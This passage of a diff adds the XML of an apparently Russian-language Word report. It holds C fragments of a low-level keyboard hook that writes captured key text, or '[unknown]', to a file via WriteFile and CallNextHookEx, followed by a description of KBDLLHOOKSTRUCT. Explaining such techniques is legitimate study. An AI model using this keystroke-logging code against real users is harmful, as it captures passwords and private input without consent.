+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>strcpy</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> + 1, "\r\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WriteFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>), &amp;written, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>else</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>{</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strcat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>, "[unknown]\r\n");</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>WriteFile</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">file, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>strlen</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>g_buf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>), &amp;written, NULL);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CallNextHookEx</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(hook, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>wParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lParam</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="2355"/>
+        </w:tabs>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
+          <w:sz w:val="12"/>
+          <w:szCs w:val="12"/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Структура KBDLLHOOKSTRUCT содержит информацию о низкоуровневом событии ввода данных с клавиатуры.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>typedef</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>struct</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DWORD  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>vkCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DWORD  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>scanCode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>DWORD  flags</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
